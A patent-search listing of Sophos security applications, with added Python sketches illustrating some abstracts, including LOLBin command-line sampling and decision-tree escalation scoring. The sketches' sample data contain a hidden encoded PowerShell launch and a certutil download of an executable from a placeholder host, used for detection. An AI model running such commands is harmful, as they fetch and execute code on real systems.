Sophos Limited

United Kingdom


51 results for Sophos Limited (WIPO patent search, excluding subsidiaries)
Most common IPC classes across the 51 results:
  • G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements (21)
  • H04L 29/06 - Communication control; Communication processing characterised by a protocol (18)
  • H04L 9/40 - Network security protocols (9)
  • G06F 21/55 - Detecting local intrusion or implementing counter-measures (6)
  • G06F 21/53 - Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems during program execution, e.g. stack integrity, buffer overflow or preventing unwanted data erasure by executing in a restricted environment, e.g. sandbox or secure virtual machine (3)

1.

CLOUD-BASED ZERO TRUST NETWORK ACCESS SERVICES

Application Number US2022054075
Publication Number 2024/081014
Status In Force
Filing Date 2022-12-27
Publication Date 2024-04-18
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Andrews, Robert, Paul
  • Kaimal, Biju, Ramachandra
  • Obulareddy, Venkata, Suresh Reddy
  • A R, Harsha
  • Patel, Neha, Parshottam
  • Katyal, Amit
  • Rajendran, Thiyagu
  • Gupta, Nitin
  • Gupta, Prashil, Rakeshkumar
  • Maheve, Sanjeev, Kumar
  • Semsu, Nabil

Abstract

Various modifications to a zero trust network access system facilitate distributed and/or cloud-based deployments of zero trust network access applications and related services, as well as remote management of network security for an enterprise that is hosting the zero trust network access applications.

IPC Classes

  • H04L 67/2895 - Intermediate processing functionally located close to the data provider application, e.g. reverse proxies
  • H04L 9/40 - Network security protocols

2.

TECHNIQUES FOR DETECTING LIVING-OFF-THE-LAND BINARY ATTACKS

Application Number GB2023052021
Publication Number 2024/033608
Status In Force
Filing Date 2023-07-31
Publication Date 2024-02-15
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Kyadige, Dinesh
  • Gelman, Uri
  • Berlin, Konstantin

Abstract

In example embodiments, techniques are provided to detect LOLBin attacks using a trained machine learning model that classifies command lines as benign or malicious. The machine learning model may be trained using a dataset of command line data that describes executed binary executable files, sourced from the log of events of compute instances. The dataset may be sampled using an approximate content-based logarithmic sampling algorithm (e.g., an algorithm that employs logarithmic sampling based on a locality sensitive hash, for example, a MinHash). The dataset may be labeled and featurized. The featurized labeled dataset may be used to train the machine learning model, which is then deployed to detect LOLBin attacks on a compute instance. In response to detection of a LOLBin attack, a remedial action may be performed on the compute instance.
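The sampling step in this abstract is the part a practitioner is most likely to want to see concretely. The block below is an added example, not Sophos's code: it MinHashes character 3-gram shingles of each command line, clusters command lines whose signatures collide in any LSH band, and keeps ceil(log2(n)) + 1 members of each cluster of size n. That "logarithmic" budget, the shingle size, the 32-hash signature and the 4-row bands are all assumptions made here to illustrate the idea; the labelling, featurisation and model training that follow in the abstract are out of scope.

```python
"""Approximate content-based logarithmic sampling of command lines with MinHash/LSH.

Added illustration (not Sophos code). Assumptions: shingles are character 3-grams of the
whitespace-normalised, lower-cased command line; 32 hash functions; LSH bands of 4 rows;
each cluster of n near-duplicates keeps ceil(log2(n)) + 1 samples.
"""
import hashlib
import math
import re
from collections import defaultdict

NUM_HASHES = 32   # signature length
BAND_SIZE = 4     # rows per LSH band -> 8 bands


def shingles(cmdline, k=3):
    """Character k-grams of the normalised command line (the 'content' being hashed)."""
    norm = re.sub(r"\s+", " ", cmdline.strip().lower())
    if len(norm) < k:
        return {norm}
    return {norm[i:i + k] for i in range(len(norm) - k + 1)}


def _h(shingle, seed):
    """One keyed 64-bit hash per seed, standing in for a family of hash functions."""
    salt = seed.to_bytes(4, "little")
    digest = hashlib.blake2b(shingle.encode("utf-8"), digest_size=8, salt=salt).digest()
    return int.from_bytes(digest, "little")


def minhash(cmdline):
    sh = shingles(cmdline)
    return tuple(min(_h(s, seed) for s in sh) for seed in range(NUM_HASHES))


def estimated_jaccard(sig_a, sig_b):
    """Fraction of agreeing signature positions estimates Jaccard(shingles_a, shingles_b)."""
    return sum(a == b for a, b in zip(sig_a, sig_b)) / len(sig_a)


def lsh_clusters(cmdlines):
    """Union-find clustering: two command lines join if any band of their signatures matches."""
    sigs = [minhash(c) for c in cmdlines]
    parent = list(range(len(cmdlines)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    for band in range(0, NUM_HASHES, BAND_SIZE):
        seen = {}
        for idx, sig in enumerate(sigs):
            key = sig[band:band + BAND_SIZE]
            if key in seen:
                parent[find(idx)] = find(seen[key])
            else:
                seen[key] = idx
    clusters = defaultdict(list)
    for idx in range(len(cmdlines)):
        clusters[find(idx)].append(idx)
    return list(clusters.values())


def log_sample(cmdlines):
    """Keep ceil(log2(n)) + 1 members (first-seen order) of every cluster of size n."""
    kept = []
    for members in lsh_clusters(cmdlines):
        budget = math.ceil(math.log2(len(members))) + 1
        kept.extend(cmdlines[i] for i in members[:budget])
    return kept


if __name__ == "__main__":
    # Constructed sample: a noisy burst of one encoded PowerShell launch plus two unrelated commands.
    log = ["powershell.exe -nop -w hidden -enc aGVsbG8="] * 20 + ["whoami", "whoami /all"]
    print(len(log), "->", len(log_sample(log)))
```

The point of sampling this way is that a dataset dominated by thousands of near-identical command lines (the usual shape of endpoint telemetry) does not drown out the rare ones; each near-duplicate family contributes only a logarithmic share of the training set.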

IPC Classes

  • G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements

3.

RAPID DEVELOPMENT OF MALICIOUS CONTENT DETECTORS

Application Number GB2023052020
Publication Number 2024/033607
Status In Force
Filing Date 2023-07-31
Publication Date 2024-02-15
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Lee, Younghoo
  • Saxe, Joshua Daniel

Abstract

Methods and systems are described for developing a malicious content detector to identify new malicious text content, such as phishing messages, malicious documents, and/or malicious web content. A computing device is used to generate input data which contains an instruction, examples of content, and content to be analyzed. The examples include malicious and benign content samples, designed to recognize similar malicious content. The computing device feeds this input into a generative language model, which produces text labels that indicate the maliciousness of the content to be analyzed. The methods and systems enable rapid development of security protection by leveraging a small number of malicious samples, instead of training with a large dataset of new training samples.

IPC Classes

  • G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements

4.

PERSISTENT IP ADDRESS ALLOCATION FOR VIRTUAL PRIVATE NETWORK (VPN) CLIENTS

Application Number GB2023051673
Publication Number 2024/003539
Status In Force
Filing Date 2023-06-27
Publication Date 2024-01-04
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Bhandari, Nikhil
  • Dommeti, Vamshi Krishna
  • Earikireddy, Praneeth Kumar Reddy

Abstract

Systems and methods for assigning a persistent internet protocol (IP) address to a virtual private network (VPN) client. The method includes receiving, at a first server, a request for access from a first VPN client, the request including access credentials and the first server having a routing table; sending, from the first server, the access credentials to an access server; receiving, from the access server at the first server, a first static IP address to be assigned to the first VPN client, wherein the first static IP address is selected from a plurality of available static IP addresses; assigning the first static IP address to the first VPN client; and adding the first static IP address to a static routing path in the routing table, the static routing path specifying an interface to which traffic associated with the first VPN client is to be routed. The static routing path is configured to be referenced to enable traffic associated with the first VPN client to be directed through the interface.
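The control flow in this abstract (VPN server forwards credentials, access server returns a persistent static address, VPN server installs a static route for it) is shown below as an added example that is not Sophos's code. The in-memory credential store, the pool CIDR and the interface names are constructed for the demonstration; a real access server would hash credentials and persist leases, and the routing table would be the kernel's rather than a dictionary.

```python
"""Persistent static IP allocation for VPN clients (added illustration, not Sophos code)."""
import hmac
import ipaddress


class AccessServer:
    """Central authority: authenticates credentials and binds one static address per identity.
    The binding persists across reconnects and across VPN servers that share this access server."""

    def __init__(self, pool_cidr, credentials):
        self._free = list(ipaddress.ip_network(pool_cidr).hosts())   # plurality of available static IPs
        self._creds = dict(credentials)   # username -> password (constructed demo; hash these for real)
        self._leases = {}                 # username -> IPv4Address, never reassigned while held

    def authenticate(self, username, password):
        expected = self._creds.get(username)
        if expected is None or not hmac.compare_digest(expected.encode(), password.encode()):
            return None
        if username not in self._leases:
            if not self._free:
                raise RuntimeError("static address pool exhausted")
            self._leases[username] = self._free.pop(0)
        return self._leases[username]


class VpnServer:
    """The 'first server' of the abstract: relays credentials and keeps a static routing path."""

    def __init__(self, access_server):
        self._access = access_server
        self.routing_table = {}   # IPv4Address -> interface the client's traffic is directed through

    def handle_access_request(self, username, password, interface):
        address = self._access.authenticate(username, password)
        if address is None:
            return None                       # access denied, nothing routed
        self.routing_table[address] = interface   # static routing path for this client
        return str(address)

    def route_for(self, address):
        """Look up the interface for a client address (what the data plane would consult)."""
        return self.routing_table.get(ipaddress.ip_address(address))


if __name__ == "__main__":
    access = AccessServer("10.8.0.0/29", {"alice": "pw-a", "bob": "pw-b"})
    gateway_a, gateway_b = VpnServer(access), VpnServer(access)
    print(gateway_a.handle_access_request("alice", "pw-a", "tun0"))   # 10.8.0.1
    print(gateway_b.handle_access_request("alice", "pw-a", "tun1"))   # 10.8.0.1 again, on the other gateway
```

Because the lease lives in the access server rather than in any one VPN server, firewall rules keyed on the client's address keep working when the client roams between gateways, which is the operational reason for wanting persistent addresses in the first place.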

IPC Classes

  • H04L 61/503 - Internet protocol [IP] addresses using an authentication, authorisation and accounting [AAA] protocol, e.g. remote authentication dial-in user service [RADIUS] or Diameter
  • H04L 61/5061 - Pools of addresses
  • H04L 67/1001 - Protocols in which an application is distributed across nodes in the network for accessing one among a plurality of replicated servers

5.

METHODS AND APPARATUS FOR MACHINE LEARNING TO GENERATE A DECISION TREE DATABASE TO IDENTIFY COMMANDS SIMILAR TO A COMMAND OF INTEREST

Application Number GB2023051290
Publication Number 2023/223023
Status In Force
Filing Date 2023-05-16
Publication Date 2023-11-23
Owner SOPHOS LIMITED (United Kingdom)
Inventor Saxe, Joshua Daniel

Abstract

A potentially malicious command including a plurality of features is received. Additionally, a plurality of nodes included in a decision tree are traversed, based on the plurality of features, to identify a leaf node included in the plurality of nodes. The leaf node is associated with (1) a first set of similar commands, each similar command from the first set of similar commands including the plurality of features, and (2) a second set of similar commands from the first set of similar commands and that were previously detected. Additionally, a probability that the potentially malicious command will be escalated as potentially malicious is determined based on the first set of similar commands and the second set of similar commands. Additionally, a first indication quantifying the first set of similar commands, a second indication quantifying the second set of similar commands, and the probability are caused to be displayed.
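The leaf-node bookkeeping described above is easier to follow with a small runnable tree. The block below is an added example, not Sophos's code: it builds a fixed-order decision tree over three toy command-line features, stores at each leaf the historical commands that reached it and the subset that analysts escalated, and reports the two counts plus a Laplace-smoothed escalation probability. The feature extractor, the split order and the history records are constructed for the example.

```python
"""Decision-tree lookup of similar commands and their escalation rate (added illustration)."""
from dataclasses import dataclass


@dataclass
class Leaf:
    similar: set      # ids of historical commands sharing this feature path (first set)
    escalated: set    # the subset of those previously escalated (second set)


@dataclass
class Node:
    feature: str
    present: object   # subtree taken when the feature is present
    absent: object    # subtree taken when it is not


FEATURE_ORDER = ("encoded", "url", "policy_bypass")   # split order of this toy tree (assumption)


def extract_features(cmdline):
    """Toy feature extractor, constructed for the example."""
    c = cmdline.lower()
    feats = set()
    if "-enc" in c:
        feats.add("encoded")
    if "http://" in c or "https://" in c:
        feats.add("url")
    if "-nop" in c or "bypass" in c:
        feats.add("policy_bypass")
    return feats


def build_tree(history, depth=0):
    """history: iterable of (command_id, feature_set, was_escalated)."""
    if depth == len(FEATURE_ORDER):
        return Leaf({cid for cid, _, _ in history}, {cid for cid, _, esc in history if esc})
    f = FEATURE_ORDER[depth]
    return Node(f,
                build_tree([h for h in history if f in h[1]], depth + 1),
                build_tree([h for h in history if f not in h[1]], depth + 1))


def traverse(node, features):
    """Walk the nodes using the command's features until a leaf is reached."""
    while isinstance(node, Node):
        node = node.present if node.feature in features else node.absent
    return node


def assess(tree, cmdline):
    """Returns (|similar|, |similar and escalated|, P(escalation)).
    Laplace smoothing keeps an empty or tiny leaf from reporting 0.0 or 1.0 with false confidence."""
    leaf = traverse(tree, extract_features(cmdline))
    n_similar, n_escalated = len(leaf.similar), len(leaf.escalated)
    return n_similar, n_escalated, (n_escalated + 1) / (n_similar + 2)


HISTORY = [   # constructed sample of past command-line alerts and analyst decisions
    ("c1", extract_features("powershell -nop -w hidden -enc aGVsbG8="), True),
    ("c2", extract_features("powershell -nop -enc ZGly"), True),
    ("c3", extract_features("powershell -nop -enc Z2V0LWRhdGU="), False),
    ("c4", extract_features("powershell get-date"), False),
    ("c5", extract_features("certutil -urlcache -f http://x/y.exe"), True),
]
TREE = build_tree(HISTORY)

if __name__ == "__main__":
    n, e, p = assess(TREE, "powershell -nop -w 1 -enc cGluZw==")
    print(f"{n} similar commands, {e} previously escalated, P(escalate) = {p:.2f}")
```

The two counts are what the analyst sees next to the probability: "3 similar, 2 escalated" tells a very different story from "300 similar, 200 escalated" even though both give the same ratio.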

IPC Classes

  • G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements

6.

SECURITY THREAT ALERT ANALYSIS AND PRIORITIZATION

Application Number GB2023051192
Publication Number 2023/218167
Status In Force
Filing Date 2023-05-05
Publication Date 2023-11-16
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Gelman, Ben Uri
  • Taoufiq, Salma
  • Berlin, Konstantin
  • Vörös, Tamás

Abstract

A method for prioritizing security events comprises receiving a security event that includes security event data having been generated by an endpoint agent based on a detected activity, wherein the security event data includes one or more features; applying a first computing model to the security event data to automatically determine which of the one or more features are one or more input features to a machine learning system; applying a second computing model to historical data related to the security event data to determine time pattern information of the security event data as an input to the machine learning system; combining the one or more input features from the first computing model and the input from the second computing model to generate a computed feature result; and generating an updated security level value of the security event from the computed feature result.

IPC Classes: none listed

7.

SECURITY OF NETWORK TRAFFIC IN A CONTAINERIZED COMPUTING ENVIRONMENT

Application Number GB2023050489
Publication Number 2023/194701
Status In Force
Filing Date 2023-03-02
Publication Date 2023-10-12
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Kaimal, Biju Ramachandra
  • Green, Jeffrey Martin

Abstract

A method comprises monitoring a computing environment including a plurality of containers, determining, for one of the containers, a service type and an IP address, assigning the IP address of the container having the determined service type to a first list of IP addresses, assigning an IP address of each of the containers to a second list of IP addresses, applying a first security policy for a first source of network traffic for processing by the container having the determined service type and the IP address assigned to the first list of IP addresses, and applying a second security policy for a second source of network traffic for processing by the containers having the IP addresses assigned to the second list of IP addresses.

IPC Classes: none listed

8.

APPLYING NETWORK ACCESS CONTROL CONFIGURATIONS WITH A NETWORK SWITCH BASED ON DEVICE HEALTH

Application Number GB2023050483
Publication Number 2023/187310
Status In Force
Filing Date 2023-03-02
Publication Date 2023-10-05
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Kaimal, Biju Ramachandra
  • Thomas, Andrew J.
  • Vaidya, Kerav
  • Bansal, Yogesh Kumar

Abstract

A method includes receiving, by a computer system, information related to device health of an electronic device, determining, by the computer system, a health status of the electronic device based at least in part on the received information related to the device health of the electronic device, requesting, by a switch having a port connected to the electronic device, the health status of the electronic device from the computer system, receiving, by the computer system, the request for the health status of the electronic device from the switch, transmitting, by the computer system, the health status of the electronic device to the switch, evaluating, by the switch, the transmitted health status of the electronic device using network access rules corresponding to health statuses, and applying, by the switch, a network access control configuration to the port of the switch based on the evaluation of the transmitted health status.

IPC Classes

  • H04L 9/40 - Network security protocols
  • G06F 21/50 - Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems

9.

SCORED THREAT SIGNATURE ANALYSIS

Application Number GB2023050474
Publication Number 2023/187309
Status In Force
Filing Date 2023-03-02
Publication Date 2023-10-05
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Subramanya, Santosh
  • Jayaraman, Shankar
  • Kurien, Sajimon
  • Kumar, Mukesh
  • Viswanathan, Guruskanthan

Abstract

Methods and systems for detecting threats using threat signatures loaded in a computing device. The methods include receiving a first plurality of threat signatures at a computing device, at least one threat signature of the first plurality of threat signatures having been assigned a score based on at least one metadata attribute having been added to the at least one threat signature; receiving a selection of a second plurality of threat signatures from the first plurality of threat signatures to load into random access memory (RAM) of the computing device, wherein at least one threat signature of the selected plurality of threat signatures is selected based on its assigned score; scanning network traffic accessible by the computing device using the at least one threat signature of the selected plurality of threat signatures; detecting a threat in the network traffic based on the scanning using the at least one threat signature of the selected plurality of threat signatures; and performing a remedial action upon detecting the threat in the network traffic.

IPC Classes

  • G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements
  • H04L 9/40 - Network security protocols

10.

METHODS AND APPARATUS FOR NATURAL LANGUAGE INTERFACE FOR CONSTRUCTING COMPLEX DATABASE QUERIES

Application Number GB2023050650
Publication Number 2023/187319
Status In Force
Filing Date 2023-03-17
Publication Date 2023-10-05
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Saxe, Joshua Daniel
  • Lee, Younghoo

Abstract

In some embodiments, a processor receives, via an interface, natural language data associated with a user request for performing an identified computational task associated with a cybersecurity management system. The processor is configured to provide the natural language data as input to a machine learning (ML) model. The ML model is configured to automatically infer a template query based on the natural language data. The processor is further configured to cause the template query to be displayed, via the interface. The processor is further configured to receive, via the interface, user input indicating a finalized query associated with the identified computational task, and to provide the finalized query as input to a system configured to perform the identified computational task. The processor is further configured to modify a security setting in the cybersecurity management system based on the performance of the identified computational task.

IPC Classes: none listed

11.

IMPLEMENTING A MACHINE-LEARNING MODEL TO IDENTIFY CRITICAL SYSTEMS IN AN ENTERPRISE ENVIRONMENT

Application Number GB2023050667
Publication Number 2023/187320
Status In Force
Filing Date 2023-03-20
Publication Date 2023-10-05
Owner SOPHOS LIMITED (United Kingdom)
Inventor Ackerman, Karl

Abstract

A computer-implemented method includes training a machine-learning model, using a training dataset that distinguishes between critical systems and non-critical systems, to classify a particular computer system as critical or non-critical, wherein a label is applied to the particular computer system during the training that identifies the particular computer system as critical or non-critical, and wherein parameters that describe the critical systems or non-critical systems are used as features during the training. The method further includes receiving an input dataset that describes a plurality of computer systems in the enterprise environment. The method further includes outputting, using the trained machine-learning model, an identification of one or more critical systems of the plurality of computer systems within the enterprise environment and an identification of one or more non-critical systems of the plurality of computer systems within the enterprise environment, wherein each identification is associated with a confidence level.

IPC Classes

  • G06F 21/57 - Certifying or maintaining trusted computer platforms, e.g. secure boots or power-downs, version controls, system software checks, secure updates or assessing vulnerabilities

12.

EARLY TERMINATION OF SECURE HANDSHAKES

Application Number GB2023050557
Publication Number 2023/180685
Status In Force
Filing Date 2023-03-09
Publication Date 2023-09-28
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Katyal, Amit
  • Obulareddy, Venkata Suresh Reddy

Abstract

A Transport Layer Security (TLS) handshake can be terminated early, i.e., before certificate validation, to reduce server-side demand, which can be particularly advantageous in counteracting Denial-of-Service (DoS) attacks and the like. To this end, an endpoint may provide a one-time password (OTP) in the client hello message during the initial steps of a TLS handshake or similar connection protocol. A gateway, upon receiving the client hello message, may generate its own OTP for comparison with the OTP in the client hello message. The endpoint and gateway may advantageously generate the OTP based on a secret provided by a threat management facility with a preexisting secure connection to the two entities. If the OTP provided in the client hello message and the OTP generated on the gateway are the same, then the TLS handshake may continue; otherwise, the Transmission Control Protocol (TCP) connection will be terminated by the gateway.
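The exchange above, as an added example that is not Sophos's code. Both sides derive the OTP as a truncated HMAC-SHA256 over the current 30-second time step under the secret the threat management facility handed out; the gateway recomputes it (tolerating one step of clock drift) and decides before any certificate or key-exchange work happens. The HMAC construction, the step length, the 8-byte truncation and the hypothetical "otp" extension name are assumptions; the abstract only says the OTP is derived from a shared secret and carried in the client hello.

```python
"""Early TLS handshake termination with a shared-secret OTP (added illustration, not Sophos code)."""
import hashlib
import hmac
import struct

STEP_SECONDS = 30   # OTP validity window (assumption)
OTP_LEN = 8         # bytes of MAC carried in the client hello (assumption)


def derive_otp(shared_secret, now, step=STEP_SECONDS):
    """Both endpoint and gateway compute this from the secret distributed by the
    threat management facility; the counter is the current time step."""
    counter = int(now // step)
    mac = hmac.new(shared_secret, struct.pack(">Q", counter), hashlib.sha256).digest()
    return mac[:OTP_LEN]


def build_client_hello(shared_secret, now):
    """Stand-in for a ClientHello: the OTP rides in a hypothetical extension named 'otp'."""
    return {"version": "TLS 1.3", "extensions": {"otp": derive_otp(shared_secret, now)}}


def gateway_accepts(client_hello, shared_secret, now, skew_steps=1):
    """Gateway decision taken before any certificate work: recompute the OTP for the current
    window and its +/- skew_steps neighbours and compare in constant time. False means the
    gateway should simply close the TCP connection."""
    presented = client_hello.get("extensions", {}).get("otp")
    if not isinstance(presented, (bytes, bytearray)) or len(presented) != OTP_LEN:
        return False
    ok = False
    for drift in range(-skew_steps, skew_steps + 1):
        candidate = derive_otp(shared_secret, now + drift * STEP_SECONDS)
        ok |= hmac.compare_digest(bytes(presented), candidate)   # no early exit: same work every path
    return ok


if __name__ == "__main__":
    secret = b"secret-from-threat-management-facility"   # constructed
    t = 1_700_000_000
    hello = build_client_hello(secret, t)
    print("accepted:", gateway_accepts(hello, secret, t))
    print("forged:", gateway_accepts(build_client_hello(b"guess", t), secret, t))
```

Two caveats worth stating. First, an OTP that is valid for a whole time window can be replayed within that window by anyone who captured a client hello, so this is a cheap filter against unauthenticated floods, not a substitute for the certificate validation it defers. Second, the check must stay constant-time and cheap, or the gateway has merely moved the DoS bottleneck rather than removed it.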

IPC Classes: none listed

13.

NETWORK APPLIANCES FOR SECURE ENTERPRISE RESOURCES

Application Number US2022018635
Publication Number 2023/069129
Status In Force
Filing Date 2022-03-03
Publication Date 2023-04-27
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Kaimal, Biju Ramachandra
  • Obulareddy, Venkata Suresh Reddy
  • Wala, Avni, Bhupendrakumar
  • Bhandari, Nikhil
  • Subramaniam, Srisakthi
  • Katyal, Amit
  • Maheve, Sanjeev Kumar
  • Rajendran, Thiyagu
  • Thomas, Andrew J.
  • Premi, Mayur
  • Cook, Robert W.
  • Kamath, Ramesh
  • Setzer, Matthew Charles
  • Nayak, Madan Mohan

Abstract

Various modifications to a distributed platform such as a zero trust network access system facilitate greater ease of deployment and administration, while also promoting ease of use and a more seamless user experience at endpoints when accessing remotely managed application resources over a network.

IPC Classes: none listed

14.

AUGMENTED THREAT INVESTIGATION

Application Number US2022030859
Publication Number 2023/064007
Status In Force
Filing Date 2022-05-25
Publication Date 2023-04-20
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Thomas, Andrew, J.
  • Vankadaru, Mangal, Rakesh
  • Talreja, Prakash, Kumar
  • Rayment, Timothy
  • Nair, Biju, Balakrishnan
  • Vysocky, Brian, Steven, Jr.
  • Griffin, Dennis, Clay

Abstract

A platform for network threat investigation is augmented with data from cloud resources such as third-party, cloud-based application platforms. The resulting merged data set can be incrementally updated, and used to automatically launch investigations at appropriate times.

IPC Classes: none listed

15.

METHODS AND APPARATUS FOR USING MACHINE LEARNING TO CLASSIFY MALICIOUS INFRASTRUCTURE

Application Number GB2022050681
Publication Number 2022/223940
Status In Force
Filing Date 2022-03-17
Publication Date 2022-10-27
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Vörös, Tamás
  • Harang, Richard
  • Saxe, Joshua Daniel

Abstract

Embodiments disclosed include methods and apparatus for detecting a reputation of infrastructure associated with potentially malicious content. In some embodiments, an apparatus includes a memory and a processor. The processor is configured to identify an Internet Protocol (IP) address associated with potentially malicious content and define each row of a matrix by applying a different subnet mask from a plurality of subnet masks to a binary representation of the IP address to define that row of the matrix. The processor is further configured to provide the matrix as an input to a machine learning model, and receive, from the machine learning model, a score associated with a maliciousness of the IP address.
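The matrix construction in this abstract is concrete enough to write down. The block below is an added example, not Sophos's code: each row is the 32-bit binary form of the address after a /8, /16, /24 or /32 mask has zeroed the host bits, so a model sees the same address at provider, block and host granularity at once. The particular set of prefix lengths is an assumption (the abstract says only "a plurality of subnet masks"), and the model that consumes the matrix is out of scope.

```python
"""IP address -> multi-granularity bit matrix (added illustration, not Sophos code)."""
import ipaddress

PREFIX_LENGTHS = (8, 16, 24, 32)   # one subnet mask per row (assumption)


def masked_bits(ip, prefix_length):
    """32-bit row: the address with every bit beyond /prefix_length zeroed."""
    addr = int(ipaddress.IPv4Address(ip))
    mask = (0xFFFFFFFF << (32 - prefix_length)) & 0xFFFFFFFF
    return [int(b) for b in format(addr & mask, "032b")]


def ip_matrix(ip, prefix_lengths=PREFIX_LENGTHS):
    """One row per mask, in a fixed order, so a model can learn which granularity
    carries reputation (a bad /24 hosting block versus one bad host)."""
    return [masked_bits(ip, n) for n in prefix_lengths]


def matrix_to_prefixes(matrix, prefix_lengths=PREFIX_LENGTHS):
    """Inverse view for humans: the CIDR prefix each row encodes."""
    out = []
    for row, n in zip(matrix, prefix_lengths):
        value = int("".join(map(str, row)), 2)
        out.append(f"{ipaddress.IPv4Address(value)}/{n}")
    return out


if __name__ == "__main__":
    m = ip_matrix("203.0.113.77")   # documentation-range address, constructed input
    for cidr, row in zip(matrix_to_prefixes(m), m):
        print(f"{cidr:>18}  {''.join(map(str, row))}")
```

Feeding the masked rows rather than the raw address is what lets the model generalise from "we have seen malware served from 203.0.113.0/24" to a host in that block it has never seen, without hand-building per-prefix reputation tables.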

IPC Classes

  • G06F 21/55 - Detecting local intrusion or implementing counter-measures
  • G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements
  • G06N 3/02 - Neural networks
  • H04L 9/40 - Network security protocols

16.

ENCRYPTED CACHE PROTECTION

Application Number GB2022050393
Publication Number 2022/208045
Status In Force
Filing Date 2022-02-14
Publication Date 2022-10-06
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Loman, Mark Willem
  • Engels, Lute Edwin
  • Tijink, Ronny Henk Gert
  • Van Hillo, Victor Marinus Johann Simon
  • Vermaning, Alexander
  • Harmsen, Jeroen

Abstract

Secrets such as secure session cookies for a web browser can be protected on a compute instance with multiple layers of encryption, such as by encrypting key material that in turn controls cryptographic access to the secret. A compute instance can be instrumented to detect when a process attempts to decrypt this key material so that the process requesting decryption can be compared to authorized or legitimate users of the secret.

IPC Classes

  • H04L 9/08 - Key distribution
  • G06F 21/60 - Protecting data
  • G06F 21/62 - Protecting access to data via a platform, e.g. using keys or access control rules

17.

CLASSIFIER GENERATOR

Application Number US2021060045
Publication Number 2022/109240
Status In Force
Filing Date 2021-11-19
Publication Date 2022-05-27
Owner SOPHOS LIMITED (United Kingdom)
Inventor Saxe, Joshua, Daniel

Abstract

A rule generator can automatically generate a machine-learning-powered detection system capable of recognizing a new malicious object or family of malicious objects and deployable as a text-based, pastable detection rule. The text may be quickly distributed and integrated into existing cybersecurity infrastructure, for example, if the cybersecurity infrastructure supports a rules engine. After initial distribution, the identity may be refined, updated, and replaced. This allows for rapid development and distribution of an initial level of protection, and for updating and improvement over time.

IPC Classes

  • G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements

18.

BEHAVIOR DETECTION AND VERIFICATION

Application Number US2021056382
Publication Number 2022/087510
Status In Force
Filing Date 2021-10-23
Publication Date 2022-04-28
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Thomas, Andrew, J.
  • Nordwall, Johan, Petter
  • Ackerman, Karl
  • Walsh, Thomas, John
  • Hoyer, Christoph, Georg
  • Stratmann, Mirco
  • Vaidya, Kerav

Abstract

When security-related behavior is detected on an endpoint (1902) through a local security agent (1904) executing on the endpoint, a threat management facility (1908) associated with the endpoint can interact with a user via a second local security agent (19041) on a second endpoint (19021) in order to solicit verification, authorization, authentication or the like related to the behavior. In one aspect, an administrator for an enterprise managed by the threat management facility may verify, authorize, or otherwise approve the detected behavior using this technique. In another aspect, a user of the device may use this infrastructure to approve of a potentially risky behavior on one device by using a verification procedure on a second device associated with the user.

IPC Classes

  • G06F 21/34 - User authentication involving the use of external additional devices, e.g. dongles or smart cards
  • G06F 21/62 - Protecting access to data via a platform, e.g. using keys or access control rules

19.

FEDERATED SECURITY FOR MULTI-ENTERPRISE COMMUNICATIONS

Application Number US2021040618
Publication Number 2022/010970
Status In Force
Filing Date 2021-07-07
Publication Date 2022-01-13
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Thomas, Andrew, J.
  • Grimm, Moritz, Daniel
  • Eckert, Thomas, Rolf-Werner
  • Ray, Kenneth, D.

Abstract

Where a single networked security service supports multiple enterprises, this security service can operate as a shared source of trust so that security devices associated with one enterprise can provide authenticated, policy-based management of computing devices associated with another enterprise. For example, an enterprise firewall can advantageously manage network access for a new device based on a shared and authenticated relationship with the networked security service.

IPC Classes

  • H04L 29/06 - Communication control; Communication processing characterised by a protocol

20.

SYSTEMS AND METHODS FOR CONDUCTING A SECURITY RECOGNITION TASK

Application Number GB2020050370
Publication Number 2020/165610
Status In Force
Filing Date 2020-02-17
Publication Date 2020-08-20
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Harang, Richard
  • Rudd, Ethan
  • Berlin, Konstantin
  • Wild, Cody
  • Ducau, Felipe

Abstract

A system for conducting a security recognition task, the system comprising a memory configured to store a model and training data including auxiliary information that will not be available as input to the model when the model is used as a security recognition task model for the security recognition task. The system further comprising one or more processors communicably linked to the memory and comprising a training unit and a prediction unit. The training unit is configured to receive the training data and the model from the memory and subsequently provide the training data to the model, and train the model, as the security recognition task model, using the training data to predict the auxiliary information as well as to perform the security recognition task, thereby improving performance of the security recognition task. The prediction unit is configured to use the security recognition task model output to perform the security recognition task while ignoring the auxiliary attributes in the model output.

IPC Classes

  • G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements
  • G06K 9/62 - Methods or arrangements for recognition using electronic means
  • G06N 3/04 - Architecture, e.g. interconnection topology
  • G06N 5/02 - Knowledge representation; Symbolic representation
  • H04L 29/06 - Communication control; Communication processing characterised by a protocol

21.

METHODS AND APPARATUS FOR USING MACHINE LEARNING TO DETECT POTENTIALLY MALICIOUS OBFUSCATED SCRIPTS

Application Number GB2020050188
Publication Number 2020/157479
Status In Force
Filing Date 2020-01-28
Publication Date 2020-08-06
